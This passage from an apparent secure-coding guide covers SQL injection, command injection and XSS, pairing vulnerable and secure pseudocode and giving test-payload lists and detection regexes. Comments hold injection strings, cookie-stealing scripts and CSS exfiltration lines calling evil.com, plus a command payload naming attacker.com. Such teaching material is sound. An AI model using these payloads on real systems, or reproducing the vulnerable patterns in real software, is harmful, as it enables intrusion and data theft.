// return database.raw(f"SELECT * FROM users WHERE id = {userId}")
// SECURE: Use ORM's parameterization
return database.raw("SELECT * FROM users WHERE id = ?", [userId])
Why this is secure:
// SECURE: Allowlist for table names
ALLOWED_TABLES = {"users", "products", "orders", "categories"}
function getDataFromTable(tableName, id):
if tableName not in ALLOWED_TABLES:
throw ValidationError("Invalid table name")
// Safe because tableName is from allowlist, not user input
query = f"SELECT * FROM {tableName} WHERE id = ?"
return database.execute(query, [id])
// SECURE: Allowlist for sort columns
SORT_COLUMNS = {
"name": "name",
"price": "price",
"date": "created_at",
"popularity": "view_count"
}
function getProducts(sortBy, sortOrder):
column = SORT_COLUMNS.get(sortBy, "name") // Default to 'name'
direction = "DESC" if sortOrder == "desc" else "ASC"
query = f"SELECT * FROM products ORDER BY {column} {direction}"
return database.execute(query)
// SECURE: Quoted identifiers as additional defense
function getDataDynamic(tableName, columnName, value):
if tableName not in ALLOWED_TABLES:
throw ValidationError("Invalid table")
if columnName not in ALLOWED_COLUMNS[tableName]:
throw ValidationError("Invalid column")
// Use database quoting function for identifiers
quotedTable = database.quoteIdentifier(tableName)
quotedColumn = database.quoteIdentifier(columnName)
query = f"SELECT * FROM {quotedTable} WHERE {quotedColumn} = ?"
return database.execute(query, [value])
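The sort-column allowlist can be sketched in Python as follows. The mapping and the `products` schema are illustrative assumptions; the point is that every fragment interpolated into the SQL string comes from constants in the code, never from the request.

```python
import sqlite3

# Maps user-facing sort keys to real column names; nothing else is accepted.
SORT_COLUMNS = {"name": "name", "price": "price", "date": "created_at"}


def build_product_query(sort_by: str, sort_order: str) -> str:
    """Build the ORDER BY query from allowlisted fragments only."""
    column = SORT_COLUMNS.get(sort_by, "name")  # unknown keys fall back to name
    direction = "DESC" if sort_order.lower() == "desc" else "ASC"
    return f"SELECT name FROM products ORDER BY {column} {direction}"


def get_products(conn: sqlite3.Connection, sort_by: str, sort_order: str = "asc"):
    return [row[0] for row in conn.execute(build_product_query(sort_by, sort_order))]
```

Falling back to a default column is a design choice; rejecting unknown keys with a validation error, as the table-name example above does, is equally valid and makes probing more visible.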
Why this is secure:
// SECURE: Argument array (no shell interpretation)
function pingHost(hostname):
// Validate hostname format first
if not isValidHostname(hostname):
throw ValidationError("Invalid hostname format")
// Use argument array - shell metacharacters are literal
result = subprocess.run(
["ping", "-c", "4", hostname],
shell = false, // CRITICAL: no shell interpretation
capture_output = true,
timeout = 30
)
return result.stdout
// SECURE: Allowlist for command arguments
ALLOWED_FORMATS = {"png", "jpg", "gif", "webp"}
function convertImage(inputPath, outputPath, format):
// Validate format from allowlist
if format not in ALLOWED_FORMATS:
throw ValidationError("Invalid format")
// Validate paths are within allowed directory
if not isPathWithinDirectory(inputPath, UPLOAD_DIR):
throw ValidationError("Invalid input path")
if not isPathWithinDirectory(outputPath, OUTPUT_DIR):
throw ValidationError("Invalid output path")
// Safe argument array
result = subprocess.run(
["convert", inputPath, "-resize", "800x600", f"{outputPath}.{format}"],
shell = false
)
return result
// SECURE: Using libraries instead of shell commands
function checkDiskUsage(directory):
// Use language-native library instead of shell
return filesystem.getDirectorySize(directory)
function readJsonFile(filepath):
// Don't use: shell.execute(f"cat {filepath} | jq .")
// Use language JSON library
return json.parse(filesystem.readFile(filepath))
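To see that an argument array really does keep metacharacters literal, the sketch below passes a hostile string to a child process and reads it back. The child is the Python interpreter itself, used as a portable stand-in for a tool like `ping`; that substitution and the name `echo_argument` are assumptions made so the example runs anywhere.

```python
import subprocess
import sys


def echo_argument(value: str) -> str:
    """Pass `value` to a child process as one argv entry and echo it back."""
    result = subprocess.run(
        [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])", value],
        shell=False,          # no shell, so ; | & $() are not interpreted
        capture_output=True,
        text=True,
        timeout=30,
        check=True,           # raise if the child exits with a non-zero status
    )
    return result.stdout
```

Calling `echo_argument("127.0.0.1; echo pwned")` returns the string unchanged because no shell ever parses it. An argument array does not stop option injection, though: a value beginning with `-` may still be read as a flag by the target program, so format validation remains necessary.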
Why this is secure:
// DANGEROUS: Data stored safely but used unsafely later
// Step 1: User creates profile (looks safe)
function createProfile(userId, displayName):
// Parameterized - SAFE for initial storage
query = "INSERT INTO profiles (user_id, display_name) VALUES (?, ?)"
database.execute(query, [userId, displayName])
// Attacker sets displayName = "admin'--"
// Step 2: Background job uses stored data UNSAFELY
function generateReportForUser(userId):
// Get the stored display name
profile = database.execute("SELECT display_name FROM profiles WHERE user_id = ?", [userId])
displayName = profile.display_name
// "admin'--" retrieved from database
// VULNERABLE: Trusting data from database
reportQuery = f"INSERT INTO reports (title) VALUES ('Report for {displayName}')"
database.execute(reportQuery)
// Result: INSERT INTO reports (title) VALUES ('Report for admin'--')
// SECURE: Parameterize ALL queries, even with "internal" data
function generateReportForUserSafe(userId):
profile = database.execute("SELECT display_name FROM profiles WHERE user_id = ?", [userId])
// Still parameterize even though data is from database
reportQuery = "INSERT INTO reports (title) VALUES (?)"
database.execute(reportQuery, [f"Report for {profile.display_name}"])
Detection: Audit every code path that uses data read from the database in a subsequent query.
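The second-order scenario can be reproduced end to end with an in-memory SQLite database. In this sketch the `profiles` and `reports` tables follow the pseudocode, and the function names are illustrative.

```python
import sqlite3


def create_profile(conn: sqlite3.Connection, user_id: int, display_name: str) -> None:
    conn.execute(
        "INSERT INTO profiles (user_id, display_name) VALUES (?, ?)",
        (user_id, display_name),
    )


def generate_report(conn: sqlite3.Connection, user_id: int) -> None:
    row = conn.execute(
        "SELECT display_name FROM profiles WHERE user_id = ?", (user_id,)
    ).fetchone()
    if row is None:
        raise LookupError(f"no profile for user {user_id}")
    # Stored data is still untrusted: bind it, do not interpolate it.
    conn.execute(
        "INSERT INTO reports (title) VALUES (?)", (f"Report for {row[0]}",)
    )
```

With both steps parameterized, a display name such as `admin'--` ends up stored verbatim in the report title instead of altering the second statement.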
// DANGEROUS: Dynamic SQL inside stored procedure
// Stored Procedure Definition (in database)
CREATE PROCEDURE searchUsers(searchTerm VARCHAR(100))
BEGIN
// VULNERABLE: Dynamic SQL construction
SET @query = CONCAT('SELECT * FROM users WHERE name LIKE ''%', searchTerm, '%''');
PREPARE stmt FROM @query;
EXECUTE stmt;
END
// Application code looks safe...
function searchUsers(term):
return database.callProcedure("searchUsers", [term])
// But injection still occurs inside the procedure!
// SECURE: Parameterized even in stored procedures
CREATE PROCEDURE searchUsersSafe(searchTerm VARCHAR(100))
BEGIN
// Use parameterization within procedure
SELECT * FROM users WHERE name LIKE CONCAT('%', searchTerm, '%');
// Or use prepared statement properly
SET @query = 'SELECT * FROM users WHERE name LIKE ?';
SET @search = CONCAT('%', searchTerm, '%');
PREPARE stmt FROM @query;
EXECUTE stmt USING @search;
END
Detection: Review all stored procedures for dynamic SQL construction.
// DANGEROUS: Encoding-based bypass attempts
// Scenario 1: Double-encoding bypass
function searchWithFilter(term):
// Application URL-decodes once
decoded = urlDecode(term) // %2527 -> %27
// WAF sees %27, not single quote
// Second decode happens: %27 -> '
query = f"SELECT * FROM items WHERE name = '{decoded}'"
// Injection succeeds
// Scenario 2: Unicode normalization bypass
function filterUsername(username):
// Check for dangerous characters
if "'" in username or "\"" in username:
throw ValidationError("Invalid characters")
// VULNERABLE: Unicode normalization happens AFTER validation
normalized = unicodeNormalize(username)
// 'ʼ' (U+02BC) might normalize to "'" (U+0027) in some systems
query = f"SELECT * FROM users WHERE username = '{normalized}'"
// SECURE: Parameterization makes encoding irrelevant
function searchSafe(term):
// Encoding doesn't matter - it's just data
query = "SELECT * FROM items WHERE name = ?"
return database.execute(query, [term])
// SECURE: Validate AFTER all normalization
function filterUsernameSafe(username):
// Normalize first
normalized = unicodeNormalize(username)
// Then validate
if not isValidUsernameChars(normalized):
throw ValidationError("Invalid characters")
// Then use (still with parameterization)
query = "SELECT * FROM users WHERE username = ?"
return database.execute(query, [normalized])
Detection: Test with a variety of encoded payloads (`%27`, `%2527`, Unicode variants).
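The normalize-then-validate order can be demonstrated with Python's `unicodedata` module. This sketch assumes NFKC normalization and a hypothetical username policy (ASCII letters, digits, and underscore, 3 to 32 characters); it uses the fullwidth apostrophe U+FF07, which NFKC maps to the ASCII quote U+0027.

```python
import re
import unicodedata

# Hypothetical policy: ASCII letters, digits, underscore, 3 to 32 characters.
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{3,32}")


def clean_username(raw: str) -> str:
    """Normalize first, then validate the normalized form."""
    normalized = unicodedata.normalize("NFKC", raw)
    if not USERNAME_RE.fullmatch(normalized):
        raise ValueError("invalid username")
    return normalized
```

A check for `'` on the raw input would pass `"bob\uff07"`, since the quote only appears after normalization; validating the normalized string rejects it. The returned value should still be bound as a query parameter rather than interpolated.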
// DANGEROUS: Manual escaping is error-prone
function getUserByNameEscaped(name):
// "Escaping" by replacing quotes
escapedName = name.replace("'", "''")
query = f"SELECT * FROM users WHERE name = '{escapedName}'"
return database.execute(query)
// Problems with this approach:
// 1. Different databases have different escape rules
// 2. Multibyte character encoding bypasses (GBK, etc.)
// 3. Doesn't handle all injection vectors
// 4. Easy to forget in one place
// 5. Backslash escaping varies by database
// Attack (MySQL with NO_BACKSLASH_ESCAPES off):
// name = "\' OR 1=1 --"
// Result: \'' OR 1=1 -- (backslash escapes first quote)
// Attack (multibyte): name = 0xbf27
// In GBK: 0xbf5c27 -> valid multibyte char + literal quote
// ALWAYS USE PARAMETERIZATION - it's not about escaping
function getUserByNameSafe(name):
query = "SELECT * FROM users WHERE name = ?"
return database.execute(query, [name])
Key insight: Parameterization does not "escape" anything; it sends the query structure and the data separately.
// DANGEROUS: Trusting data because it's "internal"
function processMessage(messageFromQueue):
// "This is from our internal queue, so it's safe"
userId = messageFromQueue.userId
query = f"SELECT * FROM users WHERE id = {userId}"
return database.execute(query)
// BUT: Where did that queue message originate?
// - User input that was serialized to queue
// - External API response stored in queue
// - Another service that has its own vulnerabilities
// DANGEROUS: Trusting data from other tables/services
function getOrderDetails(orderId):
order = database.execute("SELECT * FROM orders WHERE id = ?", [orderId])
// Order.notes was user-supplied
query = f"SELECT * FROM notes WHERE content LIKE '%{order.notes}%'"
// Still vulnerable to second-order injection
// SECURE: Parameterize ALL queries regardless of data source
function processMessageSafe(messageFromQueue):
query = "SELECT * FROM users WHERE id = ?"
return database.execute(query, [messageFromQueue.userId])
Rule: Never trust any data when building a query; always parameterize.
// DANGEROUS: Parameterizing some parts but not others
function searchUsers(name, sortColumn, limit):
// Parameterized the value, but not ORDER BY or LIMIT
query = f"SELECT * FROM users WHERE name = ? ORDER BY {sortColumn} LIMIT {limit}"
return database.execute(query, [name])
// Attack: sortColumn = "1; DELETE FROM users; --"
// Attack: limit = "1 UNION SELECT password FROM admin_users"
// DANGEROUS: Parameterized WHERE but not table
function getDataFlexible(tableName, filterColumn, filterValue):
query = f"SELECT * FROM {tableName} WHERE {filterColumn} = ?"
return database.execute(query, [filterValue])
// Table name and column still injectable
// SECURE: Validate/allowlist everything that can't be parameterized
function searchUsersSafe(name, sortColumn, limit):
// Allowlist for sort column
allowedSorts = {"name", "email", "created_at"}
sortCol = sortColumn if sortColumn in allowedSorts else "name"
// Validate limit is positive integer
limitNum = min(max(int(limit), 1), 100) // Clamp to 1-100
query = f"SELECT * FROM users WHERE name = ? ORDER BY {sortCol} LIMIT {limitNum}"
return database.execute(query, [name])
Key insight: Every injectable position needs either parameterization or allowlist validation.
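As a rough Python counterpart to `searchUsersSafe`, the sketch below uses `sqlite3` with an assumed `users` table. The sort column is checked against an allowlist because identifiers cannot be bound as parameters, and the limit is coerced to an integer and clamped before being bound.

```python
import sqlite3

ALLOWED_SORTS = {"name", "email", "created_at"}  # identifiers cannot be bound as parameters

def search_users_safe(conn, name, sort_column, limit):
    # Fall back to a known column when the requested one is not allowlisted.
    sort_col = sort_column if sort_column in ALLOWED_SORTS else "name"
    # int() raises ValueError on non-numeric input; the result is clamped to 1..100.
    limit_num = min(max(int(limit), 1), 100)
    query = f"SELECT name, email FROM users WHERE name = ? ORDER BY {sort_col} LIMIT ?"
    return conn.execute(query, (name, limit_num)).fetchall()

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, email TEXT, created_at TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
    ("alice", "zed@example.com", "2024-01-01"),
    ("alice", "amy@example.com", "2024-01-02"),
])

# The hostile sort column is replaced by the default; the oversized limit is clamped.
rows = search_users_safe(conn, "alice", "1; DELETE FROM users; --", "9999")
```

Rejecting a non-numeric limit with an exception, rather than silently substituting a default, is a design choice made here for illustration; either approach keeps the value out of the SQL text.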
// Regex patterns to find SQL injection vulnerabilities:
// 1. String concatenation with SQL keywords
regex: /(SELECT|INSERT|UPDATE|DELETE|FROM|WHERE|ORDER BY).*(\+|\.concat|\$\{|f['"])/i
// 2. Format strings with SQL
regex: /f["'].*\b(SELECT|INSERT|UPDATE|DELETE)\b.*\{.*\}/i
// 3. String interpolation in queries
regex: /execute\s*\(\s*["`'].*\$\{?[a-zA-Z_]/
// Command injection patterns:
// 4. Shell execution with concatenation
regex: /(system|exec|shell_exec|popen|subprocess\.run|os\.system)\s*\(.*(\+|\$\{|f['"])/
// 5. Shell=True with variables
regex: /shell\s*=\s*[Tt]rue.*\{|shell\s*=\s*[Tt]rue.*\+/
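Patterns like these can be wired into a quick line-based scanner. The Python sketch below uses simplified variants of the regexes above (the rule names and the sample snippet are assumptions), and it is a heuristic only: expect both false positives and false negatives.

```python
import re

# Simplified, heuristic variants of the detection patterns.
PATTERNS = {
    "sql-fstring": re.compile(r"""f["'].*\b(SELECT|INSERT|UPDATE|DELETE)\b.*\{.*\}""", re.IGNORECASE),
    "sql-concat": re.compile(r"""["'].*\b(SELECT|INSERT|UPDATE|DELETE)\b.*["']\s*\+""", re.IGNORECASE),
    "shell-true": re.compile(r"shell\s*=\s*True"),
}

def scan_source(source: str):
    """Return (line_number, rule_name) pairs for lines that match a pattern."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for rule, pattern in PATTERNS.items():
            if pattern.search(line):
                findings.append((lineno, rule))
    return findings

# Line 1 of the sample is empty because the literal starts with a newline.
sample = '''
query = f"SELECT * FROM users WHERE id = {user_id}"
query = "SELECT * FROM users WHERE name = '" + name + "'"
cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))
subprocess.run(cmd, shell=True)
'''
findings = scan_source(sample)
```

The parameterized call on line 4 of the sample is not flagged, while the f-string, the concatenation, and the `shell=True` call are.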
// SQL Injection Test Payloads:
basicTests = [
"' OR '1'='1", // Basic auth bypass
"'; DROP TABLE test; --", // Stacked queries
"' UNION SELECT null--", // Union-based
"1 AND 1=1", // Boolean-based
"1' AND SLEEP(5)--", // Time-based blind
]
// Command Injection Test Payloads:
commandTests = [
"; whoami", // Command chaining
"| id", // Pipe injection
"$(whoami)", // Command substitution
"`id`", // Backtick substitution
"& ping -c 4 attacker.com", // Background execution
]
// Testing Methodology:
1. Identify all input points (forms, URLs, headers, JSON fields)
2. Trace input flow to database queries or shell commands
3. Inject test payloads at each point
4. Monitor for:
- SQL errors in response
- Time delays (for blind injection)
- DNS/HTTP callbacks (for out-of-band)
- Changed behavior indicating injection success
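| Check | What to look for |
|---|---|
| Query construction | Any string concatenation or interpolation into query strings |
| Dynamic identifiers | Table names, column names, or ORDER BY values taken from user input |
| Raw queries in ORMs | `.raw()`, `.execute()`, or similar calls built from strings |
| Shell execution | Any use of `system()`, `exec()`, or `shell=True` |
| Command building | String concatenation before command execution |
| Input sources | Trace data from the request to the query or command |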
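CWE References: CWE-79 (Improper Neutralization of Input During Web Page Generation), CWE-80 (Basic XSS), CWE-83 (Improper Neutralization in Attributes), CWE-87 (Improper Neutralization in URIs)
Priority score: 23 (Frequency: 10, Severity: 8, Detectability: 5)
Cross-site scripting (XSS) is one of the most common vulnerabilities in AI-generated code. Studies report that 86% of AI-generated code fails to defend against XSS (Veracode 2025), and that AI-generated code is 2.74 times more likely to contain XSS than human-written code (CodeRabbit analysis).
Why AI models generate XSS vulnerabilities:
Context blindness: XSS prevention requires understanding the context in which user input will be rendered: HTML body, attribute, JavaScript, CSS, or URL. Each context needs different encoding. Lacking awareness of the rendering context, AI models often apply generic encoding or none at all.
innerHTML everywhere in training data: Tutorials and Stack Overflow answers make heavy use of `innerHTML`, `document.write()`, and template string injection for DOM manipulation. AI models learn these as standard patterns.
Framework misunderstanding: Modern frameworks such as React escape output automatically, but AI models often bypass these protections with `dangerouslySetInnerHTML`, `v-html`, or raw template interpolation, especially when a task seems to require "rich" HTML output.
Encoding versus validation confusion: AI models often perform input validation (checking for allowed characters) but omit output encoding (rendering data safely in its context). Validation protects data integrity; encoding prevents XSS.
Client-side trust: AI models often treat client-side code as "safe" because it runs in the browser. They fail to recognize that XSS exploits precisely the trust a browser places in the application.
Impact of XSS:
XSS variants:
| Type | Storage | Execution | Example vector |
|---|---|---|---|
| Reflected | URL/request | Immediate | Search query echoed on the results page |
| Stored | Database | Later visitors | Blog comment containing a script |
| DOM-based | Client side | JavaScript processing | URL fragment processed by JS |
| Mutation (mXSS) | Sanitizer bypass | DOM mutation | Markup that changes during parsing |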
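The difference between validation and encoding can be sketched in a few lines of Python. The name rule and the function names below are hypothetical; `html.escape` is the standard-library encoder for HTML body and quoted-attribute contexts.

```python
import html
import re

NAME_RE = re.compile(r"[A-Za-z' -]{1,40}")  # hypothetical rule for a display-name field

def is_valid_name(value: str) -> bool:
    """Input validation: does the data look like a name at all?"""
    return NAME_RE.fullmatch(value) is not None

def render_greeting(name: str) -> str:
    """Output encoding: make the value inert in an HTML body context."""
    return "<p>Hello, " + html.escape(name, quote=True) + "</p>"

# A perfectly valid name still contains a character that matters to HTML.
valid = is_valid_name("O'Brien")
greeting = render_greeting("O'Brien")

# Encoding neutralizes markup even if validation was skipped or too permissive.
hostile = render_greeting("<script>alert(1)</script>")
```

Validation accepts `O'Brien`, yet the apostrophe still has to be encoded on output. Passing validation says nothing about whether a value is safe in a given rendering context.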
// VULNERABLE: Direct injection into HTML body
function displayUserComment(comment):
// User input directly placed in HTML
document.getElementById("comments").innerHTML =
"<div class='comment'>" + comment + "</div>"
// Attack: comment = "<script>document.location='http://evil.com/steal?c='+document.cookie</script>"
// Result: Script executes, cookies sent to attacker
// VULNERABLE: Server-side template without encoding
function renderProfilePage(username, bio):
return """
<html>
<body>
<h1>Profile: {username}</h1>
<p>{bio}</p>
</body>
</html>
""".format(username=username, bio=bio)
// Attack: bio = "<img src=x onerror='alert(document.cookie)'>"
// Result: onerror handler executes JavaScript
// VULNERABLE: Using document.write
function showWelcome(name):
document.write("<h2>Welcome, " + name + "!</h2>")
// Attack: name = "<img src=x onerror=alert('XSS')>"
Why this is dangerous:
- Event handlers (`onerror`, `onload`, `onclick`) execute without script tags
- `document.write` and `innerHTML` parse HTML contained in user input
// VULNERABLE: User input in HTML attributes
function renderImage(imageUrl, altText):
return '<img src="' + imageUrl + '" alt="' + altText + '">'
// Attack: altText = '" onmouseover="alert(document.cookie)" x="'
// Result: <img src="img.jpg" alt="" onmouseover="alert(document.cookie)" x="">
// VULNERABLE: Unquoted attributes
function renderLink(url, text):
return "<a href=" + url + ">" + text + "</a>"
// Attack: url = "http://site.com onclick=alert(1)"
// Result: <a href=http://site.com onclick=alert(1)>text</a>
// VULNERABLE: Input in style attribute
function setBackgroundColor(color):
element.setAttribute("style", "background-color: " + color)
// Attack: color = "red; background-image: url('javascript:alert(1)')"
// Attack: color = "expression(alert('XSS'))" // IE-specific
// VULNERABLE: Event handler attribute
function renderButton(buttonId, label):
return '<button id="' + buttonId + '" onclick="handleClick(\'' + label + '\')">' + label + '</button>'
// Attack: label = "'); alert(document.cookie); ('"
// Result: onclick="handleClick(''); alert(document.cookie); ('")"
Why this is dangerous:
- Attributes such as `href`, `src`, and `style` have special parsing rules
// VULNERABLE: User input embedded in JavaScript
function generateUserScript(username):
return """
<script>
var currentUser = '{username}';
displayGreeting(currentUser);
</script>
""".format(username=username)
// Attack: username = "'; alert(document.cookie); //'"
// Result: var currentUser = ''; alert(document.cookie); //';
// VULNERABLE: JSON data embedded in script
function embedUserData(userData):
return """
<script>
var data = {userData};
processData(data);
</script>
""".format(userData=jsonEncode(userData))
// Attack: userData contains </script><script>alert(1)</script>
// JSON encoding doesn't prevent HTML context escape
// VULNERABLE: Template literals with user input
function renderTemplate(message):
return `<script>showNotification("${message}")</script>`
// Attack: message = '${alert(document.cookie)}' // Template literal injection
// Attack: message = '");alert(document.cookie);//' // String escape
// VULNERABLE: Dynamic script construction
function addEventHandler(eventName, userCallback):
element.setAttribute("onclick", "handleEvent('" + userCallback + "')")
// Attack: userCallback = "'); stealData(); ('"
Why this is dangerous:
- A closing tag (`</script>`) in the data can break out of the script block
// VULNERABLE: User input in href attribute
function renderNavLink(destination):
return '<a href="' + destination + '">Click here</a>'
// Attack: destination = "javascript:alert(document.cookie)"
// Result: <a href="javascript:alert(document.cookie)">Click here</a>
// VULNERABLE: URL parameters without encoding
function buildSearchUrl(query):
return '<a href="/search?q=' + query + '">Search again</a>'
// Attack: query = '" onclick="alert(1)" x="'
// Result: <a href="/search?q=" onclick="alert(1)" x="">Search again</a>
// VULNERABLE: Redirect based on user input
function handleRedirect(url):
window.location = url
// Attack: url = "javascript:alert(document.cookie)"
// Result: JavaScript execution via location change
// VULNERABLE: Open redirect leading to XSS
function redirectAfterLogin(returnUrl):
return '<meta http-equiv="refresh" content="0;url=' + returnUrl + '">'
// Attack: returnUrl = "data:text/html,<script>alert(1)</script>"
// Attack: returnUrl = "javascript:alert(1)"
Why this is dangerous:
- `javascript:` URLs execute code when navigated to
- `data:` URLs can contain executable HTML/JavaScript
- `vbscript:` URLs execute in legacy IE browsers
// VULNERABLE: User input in CSS
function applyCustomStyle(customCss):
styleElement = document.createElement("style")
styleElement.textContent = ".user-style { " + customCss + " }"
document.head.appendChild(styleElement)
// Attack: customCss = "} body { background: url('http://evil.com/log?data=' + document.cookie); } .x {"
// Result: CSS exfiltration of page data
// VULNERABLE: CSS expression (legacy IE)
function setWidth(width):
element.style.cssText = "width: " + width
// Attack: width = "expression(alert(document.cookie))"
// Result: JavaScript execution via CSS expression (IE)
// VULNERABLE: CSS injection via style attribute
function renderAvatar(avatarUrl):
return '<div style="background-image: url(' + avatarUrl + ')"></div>'
// Attack: avatarUrl = "x); } body { background: red; } .x { content: url(x"
// Modern Attack: avatarUrl = "https://evil.com/?' + btoa(document.body.innerHTML) + '"
// VULNERABLE: CSS @import injection
function loadTheme(themeUrl):
return "<style>@import url('" + themeUrl + "');</style>"
// Attack: themeUrl = "'); } * { background: url('http://evil.com/steal?"
Why this is dangerous:
- `url()` in CSS can leak data through outbound requests
- `expression()` executes JavaScript
- `@import` can load attacker-controlled stylesheets
// SECURE: HTML entity encoding for body content
function htmlEncode(str):
return str
.replace("&", "&amp;") // Must be first
.replace("<", "&lt;")
.replace(">", "&gt;")
.replace('"', "&quot;")
.replace("'", "&#x27;")
.replace("/", "&#x2F;") // Prevents </script> escapes
function displayUserComment(comment):
safeComment = htmlEncode(comment)
document.getElementById("comments").innerHTML =
"<div class='comment'>" + safeComment + "</div>"
// SECURE: Using textContent instead of innerHTML
function displayUserCommentSafe(comment):
div = document.createElement("div")
div.className = "comment"
div.textContent = comment // Automatically safe - no HTML interpretation
document.getElementById("comments").appendChild(div)
// SECURE: Server-side template with auto-escaping
function renderProfilePage(username, bio):
// Use templating engine with auto-escaping enabled
return template.render("profile.html", {
username: username, // Engine auto-escapes
bio: bio
})
// SECURE: Framework createElement pattern
function createUserCard(name, email):
card = document.createElement("article")
nameEl = document.createElement("h3")
nameEl.textContent = name // Safe
emailEl = document.createElement("p")
emailEl.textContent = email // Safe
card.appendChild(nameEl)
card.appendChild(emailEl)
return card
Why this is secure:
- `textContent` never interprets HTML
// SECURE: Attribute encoding (superset of HTML encoding)
function attributeEncode(str):
return str
.replace("&", "&amp;")
.replace("<", "&lt;")
.replace(">", "&gt;")
.replace('"', "&quot;")
.replace("'", "&#x27;")
.replace("`", "&#x60;")
.replace("=", "&#x3D;")
// SECURE: Always quote attributes and encode values
function renderImage(imageUrl, altText):
safeUrl = attributeEncode(imageUrl)
safeAlt = attributeEncode(altText)
return '<img src="' + safeUrl + '" alt="' + safeAlt + '">'
// SECURE: Using setAttribute (browser handles encoding)
function renderImageSafe(imageUrl, altText):
img = document.createElement("img")
img.setAttribute("src", imageUrl) // Safe
img.setAttribute("alt", altText) // Safe
return img
// SECURE: Data attributes with proper encoding
function renderDataElement(userId, userName):
div = document.createElement("div")
div.dataset.userId = userId // Automatically safe
div.dataset.userName = userName // Automatically safe
return div
// SECURE: Style attribute with validation
ALLOWED_COLORS = {"red", "blue", "green", "yellow", "#fff", "#000"}
function setBackgroundColor(color):
if color in ALLOWED_COLORS:
element.style.backgroundColor = color
else:
element.style.backgroundColor = "white" // Safe default
Why this is secure:
// SECURE: JavaScript string encoding
function jsStringEncode(str):
return str
.replace("\\", "\\\\") // Backslash first
.replace("'", "\\'")
.replace('"', '\\"')
.replace("\n", "\\n")
.replace("\r", "\\r")
.replace("</", "<\\/") // Prevent script tag escape
.replace("<!--", "\\x3C!--") // Prevent HTML comment
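// SECURE: JSON encoding for embedding data
function generateUserScript(userData):
// Serialize to JSON first
jsonData = jsonEncode(userData)
// Escape characters the HTML parser reacts to, using \uXXXX escapes.
// HTML entities are NOT decoded inside <script>, so htmlEncode would corrupt the data.
safeJson = jsonData
.replace("<", "\\u003C") // Prevents </script> and <!-- breakout
.replace(">", "\\u003E")
.replace("&", "\\u0026")
return """
<script>
var data = {safeJson};
processData(data);
</script>
""".format(safeJson=safeJson)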
// BETTER: Use data attributes instead of inline scripts
function embedUserDataSafe(element, userData):
// Store data in attribute, process in external script
element.dataset.user = jsonEncode(userData)
// External script reads: JSON.parse(element.dataset.user)
// SECURE: Separate data from code with JSON endpoint
function loadUserData():
// Instead of embedding in HTML, fetch from API
fetch('/api/user/data')
.then(response => response.json())
.then(data => processData(data))
// SECURE: Using structured data in script type
function embedStructuredData(pageData):
return """
<script type="application/json" id="page-data">
{jsonData}
</script>
<script>
var data = JSON.parse(
document.getElementById('page-data').textContent
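);
</script>
""".format(jsonData=jsonEncode(pageData).replace("<", "\\u003C")) // Escape "<" so the data cannot close the block
Why this is secure:
- Escaping `</script>` sequences keeps data from closing the script block
- `type="application/json"` blocks are not executed as JavaScript
// SECURE: URL encoding for query parameters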
function urlEncode(str):
return encodeURIComponent(str)
function buildSearchUrl(query):
safeQuery = urlEncode(query)
return '/search?q=' + safeQuery
// SECURE: Validating URL schemes (allowlist)
SAFE_SCHEMES = {"http", "https", "mailto"}
function validateUrl(url):
try:
parsed = parseUrl(url)
if parsed.scheme.lower() in SAFE_SCHEMES:
return url
catch:
pass
return "/fallback" // Safe default
function renderLink(destination, text):
safeUrl = validateUrl(destination)
safeText = htmlEncode(text)
return '<a href="' + attributeEncode(safeUrl) + '">' + safeText + '</a>'
// SECURE: URL validation with additional checks
function validateExternalUrl(url):
parsed = parseUrl(url)
// Check scheme
if parsed.scheme.lower() not in {"http", "https"}:
return null
// Check for credential injection
if parsed.username or parsed.password:
return null
// Check for IP address (optional restriction)
if isIpAddress(parsed.host):
return null
return url
// SECURE: Relative URLs only (prevent open redirect)
function validateRedirectUrl(url):
// Only allow relative paths
if url.startsWith("/") and not url.startsWith("//"):
// Prevent path traversal
normalized = normalizePath(url)
if not ".." in normalized:
return normalized
return "/" // Safe default
Why this is secure:
- `encodeURIComponent` handles special characters
- Scheme allowlisting rejects `javascript:` and `data:` URLs
// SECURE: Safe DOM manipulation patterns
// Instead of innerHTML with user data:
// DANGEROUS: element.innerHTML = "<p>" + userInput + "</p>"
// SECURE: Use textContent for text nodes
function setElementText(element, text):
element.textContent = text // Never interprets HTML
// SECURE: Build DOM programmatically
function createListItem(text, isHighlighted):
li = document.createElement("li")
li.textContent = text // Safe text assignment
if isHighlighted:
li.classList.add("highlighted") // Safe class manipulation
return li
// SECURE: Use template elements for complex HTML
function createCardFromTemplate(name, description):
template = document.getElementById("card-template")
card = template.content.cloneNode(true)
// Set text content safely
card.querySelector(".card-name").textContent = name
card.querySelector(".card-desc").textContent = description
return card
// SECURE: Use DocumentFragment for batch operations
function renderList(items):
fragment = document.createDocumentFragment()
for item in items:
li = document.createElement("li")
li.textContent = item.name // Safe
fragment.appendChild(li)
document.getElementById("list").appendChild(fragment)
// SECURE: Sanitize when HTML is genuinely needed
function renderRichContent(htmlContent):
// Use DOMPurify or similar trusted sanitizer
sanitized = DOMPurify.sanitize(htmlContent, {
ALLOWED_TAGS: ["b", "i", "em", "strong", "a", "p", "br"],
ALLOWED_ATTR: ["href"],
ALLOW_DATA_ATTR: false
})
element.innerHTML = sanitized
Why this is secure:
- `textContent` never parses HTML or scripts
- `createElement` + `textContent` is inherently safe
// DANGEROUS: Browser mutations can bypass sanitization
// How mXSS works:
// 1. Sanitizer processes malformed HTML
// 2. Browser "fixes" the HTML during parsing
// 3. Fixed HTML contains executable content
// Example: Backtick mutation
inputHtml = "<img src=x onerror=`alert(1)`>"
// Some sanitizers don't escape backticks
// Browser may convert backticks to quotes in certain contexts
// Example: Namespace confusion
inputHtml = "<math><annotation-xml><foreignObject><script>alert(1)</script>"
// SVG/MathML namespaces have different parsing rules
// Sanitizer might miss the nested script
// Example: Table element mutations
inputHtml = "<table><form><input name='x'></form></table>"
// Browser moves <form> outside <table> during parsing
// Can result in unexpected DOM structure
// SECURE: Use battle-tested sanitizer with mXSS protection
function sanitizeHtml(html):
return DOMPurify.sanitize(html, {
// DOMPurify has mXSS protection built-in
USE_PROFILES: {html: true},
// Optionally restrict further
FORBID_TAGS: ["style", "math", "svg"],
FORBID_ATTR: ["style"]
})
// BETTER: Avoid HTML sanitization when possible
